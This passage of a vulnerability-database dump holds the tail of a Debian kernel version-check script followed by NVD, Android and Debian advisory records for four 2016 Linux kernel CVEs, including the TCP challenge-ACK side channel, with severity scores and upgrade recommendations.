ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mips\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mipsel\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-powerpc\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-ppc64el\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-s390x\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-amd64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-arm64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp-lpae\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-common\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-ixp4xx\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-kirkwood\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2e\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-3\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-orion5x\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc-smp\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64le\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-s390x\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-versatile\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-586\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae-dbg\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64-dbg\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64-dbg\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp-lpae\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-ixp4xx\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-kirkwood\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2e\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-3\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-orion5x\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc-smp\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64le\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x-dbg\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-versatile\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-3.16\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-3.16\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-3.16.0-4\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-4-amd64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "naslFamily": "Debian Local Security Checks"}
{"cve": [{"lastseen": "2021-02-02T06:28:09", "description": "net/ipv4/tcp_input.c in the Linux kernel before 4.7 does not properly determine the rate of challenge ACK segments, which makes it easier for remote attackers to hijack TCP sessions via a blind in-window attack.", "edition": 7, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 4.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 2.5}, "published": "2016-08-06T20:59:00", "title": "CVE-2016-5696", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5696"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/a:oracle:vm_server:3.3", "cpe:/o:linux:linux_kernel:4.6.6", "cpe:/o:google:android:7.0", "cpe:/a:oracle:vm_server:3.4"], "id": "CVE-2016-5696", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5696", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_server:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_server:3.4:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:09", "description": "Race condition in the audit_log_single_execve_arg function in kernel/auditsc.c in the Linux kernel through 4.7 allows local users to bypass intended character-set restrictions or disrupt system-call auditing by changing a certain string, aka a \"double fetch\" vulnerability.", "edition": 6, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-06T20:59:00", "title": "CVE-2016-6136", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6136"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.7"], "id": "CVE-2016-6136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6136", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:10", "description": "Race condition in the ioctl_send_fib function in drivers/scsi/aacraid/commctrl.c in the Linux kernel through 4.7 allows local users to cause a denial of service (out-of-bounds access or system crash) by changing a certain size value, aka a \"double fetch\" vulnerability.", "edition": 6, "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-06T20:59:00", "title": "CVE-2016-6480", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6480"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.7"], "id": "CVE-2016-6480", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6480", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:10", "description": "The tcp_check_send_head function in include/net/tcp.h in the Linux kernel before 4.7.5 does not properly maintain certain SACK state after a failed data copy, which allows local users to cause a denial of service (tcp_xmit_retransmit_queue use-after-free and system crash) via a crafted SACK option.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-10-16T21:59:00", "title": "CVE-2016-6828", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6828"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.7.4"], "id": "CVE-2016-6828", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6828", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.7.4:*:*:*:*:*:*:*"]}], "android": [{"lastseen": "2020-06-22T14:42:12", "bulletinFamily": "software", "cvelist": ["CVE-2016-6828"], "description": "The tcp_check_send_head function in include/net/tcp.h in the Linux kernel before 4.7.5 does not properly maintain certain SACK state after a failed data copy, which allows local users to cause a denial of service (tcp_xmit_retransmit_queue use-after-free and system crash) via a crafted SACK option.", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-11-01T00:00:00", "id": "ANDROID:CVE-2016-6828", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-6828.html", "title": "CVE-2016-6828", "type": "android", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "debian": [{"lastseen": "2020-08-12T00:57:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-5696", "CVE-2016-6136", "CVE-2016-6828"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3659-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 04, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2016-5696 CVE-2016-6136 CVE-2016-6480 CVE-2016-6828\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or have other\nimpacts.\n\nCVE-2016-5696\n\n Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\n Krishnamurthy of the University of California, Riverside; and Lisa\n M. Marvel of the United States Army Research Laboratory discovered\n that Linux's implementation of the TCP Challenge ACK feature\n results in a side channel that can be used to find TCP connections\n between specific IP addresses, and to inject messages into those\n connections.\n\n Where a service is made available through TCP, this may allow\n remote attackers to impersonate another connected user to the\n server or to impersonate the server to another connected user. In\n case the service uses a protocol with message authentication\n (e.g. TLS or SSH), this vulnerability only allows denial of\n service (connection failure). An attack takes tens of seconds, so\n short-lived TCP connections are also unlikely to be vulnerable.\n\n This may be mitigated by increasing the rate limit for TCP\n Challenge ACKs so that it is never exceeded:\n sysctl net.ipv4.tcp_challenge_ack_limit=1000000000\n\nCVE-2016-6136\n\n Pengfei Wang discovered that the audit subsystem has a\n 'double-fetch' or 'TOCTTOU' bug in its handling of special\n characters in the name of an executable. Where audit logging of\n execve() is enabled, this allows a local user to generate\n misleading log messages.\n\nCVE-2016-6480\n\n Pengfei Wang discovered that the aacraid driver for Adaptec RAID\n controllers has a 'double-fetch' or 'TOCTTOU' bug in its\n validation of 'FIB' messages passed through the ioctl() system\n call. This has no practical security impact in current Debian\n releases.\n\nCVE-2016-6828\n\n Marco Grassi reported a 'use-after-free' bug in the TCP\n implementation, which can be triggered by local users. The\n security impact is unclear, but might include denial of service or\n privilege escalation.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 3.16.36-1+deb8u1. In addition, this update contains several\nchanges originally targeted for the upcoming jessie point release.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 18, "modified": "2016-09-04T17:25:13", "published": "2016-09-04T17:25:13", "id": "DEBIAN:DSA-3659-1:3F508", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00238.html", "title": "[SECURITY] [DSA 3659-1] linux security update", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-7118", "CVE-2016-5696", "CVE-2016-3857", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-5829", "CVE-2016-4470"], "description": "Package : linux\nVersion : 3.2.81-2\nCVE ID : CVE-2016-3857 CVE-2016-4470 CVE-2016-5696 CVE-2016-5829 \n CVE-2016-6136 CVE-2016-6480 CVE-2016-6828 CVE-2016-7118\nDebian Bug : 827561\n\nThis update fixes the CVEs described below.\n\nCVE-2016-3857\n\n Chiachih Wu reported two bugs in the ARM OABI compatibility layer\n that can be used by local users for privilege escalation. The\n OABI compatibility layer is enabled in all kernel flavours for\n armel and armhf.\n\nCVE-2016-4470\n\n Wade Mealing of the Red Hat Product Security Team reported that\n in some error cases the KEYS subsystem will dereference an\n uninitialised pointer. A local user can use the keyctl()\n system call for denial of service (crash) or possibly for\n privilege escalation.\n\nCVE-2016-5696\n\n Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\n Krishnamurthy of the University of California, Riverside; and Lisa\n M. Marvel of the United States Army Research Laboratory discovered\n that Linux's implementation of the TCP Challenge ACK feature\n results in a side channel that can be used to find TCP connections\n between specific IP addresses, and to inject messages into those\n connections.\n\n Where a service is made available through TCP, this may allow\n remote attackers to impersonate another connected user to the\n server or to impersonate the server to another connected user. In\n case the service uses a protocol with message authentication\n (e.g. TLS or SSH), this vulnerability only allows denial of\n service (connection failure). An attack takes tens of seconds, so\n short-lived TCP connections are also unlikely to be vulnerable.\n\n This may be mitigated by increasing the rate limit for TCP\n Challenge ACKs so that it is never exceeded:\n sysctl net.ipv4.tcp_challenge_ack_limit=1000000000\n\nCVE-2016-5829\n\n Several heap-based buffer overflow vulnerabilities were found in\n the hiddev driver, allowing a local user with access to a HID\n device to cause a denial of service or potentially escalate their\n privileges.\n\nCVE-2016-6136\n\n Pengfei Wang discovered that the audit subsystem has a\n 'double-fetch' or 'TOCTTOU' bug in its handling of special\n characters in the name of an executable. Where audit logging of\n execve() is enabled, this allows a local user to generate\n misleading log messages.\n\nCVE-2016-6480\n\n Pengfei Wang discovered that the aacraid driver for Adaptec RAID\n controllers has a 'double-fetch' or 'TOCTTOU' bug in its\n validation of 'FIB' messages passed through the ioctl() system\n call. This has no practical security impact in current Debian\n releases.\n\nCVE-2016-6828\n\n Marco Grassi reported a 'use-after-free' bug in the TCP\n implementation, which can be triggered by local users. The\n security impact is unclear, but might include denial of service or\n privilege escalation.\n\nCVE-2016-7118\n\n Marcin Szewczyk reported that calling fcntl() on a file descriptor\n for a directory on an aufs filesystem would result in am 'oops'.\n This allows local users to cause a denial of service. This is a\n Debian-specific regression introduced in version 3.2.81-1.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.2.81-2. This version also fixes a build failure (bug #827561) for\ncustom kernels with CONFIG_MODULES disabled, a regression in version\n3.2.81-1. It also updates the PREEMPT_RT featureset to version\n3.2.81-rt117.\n\nFor Debian 8 "Jessie", CVE-2016-3857 has no impact; CVE-2016-4470 and\nCVE-2016-5829 were fixed in linux version 3.16.7-ckt25-2+deb8u3 or\nearlier; and the remaining issues are fixed in version 3.16.36-1+deb8u1.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings - Debian developer, member of kernel, installer and LTS teams", "edition": 3, "modified": "2016-09-03T11:54:21", "published": "2016-09-03T11:54:21", "id": "DEBIAN:DLA-609-1:1025A", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201609/msg00002.html", "title": "[SECURITY] [DLA 609-1] linux security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T09:49:47", "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or have other\nimpacts.\n\n - CVE-2016-5696\n Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and\n Srikanth V. Krishnamurthy of the University of\n California, Riverside; and Lisa M. Marvel of the United\n States Army Research Laboratory discovered that Linux's\n implementation of the TCP Challenge ACK feature results\n in a side 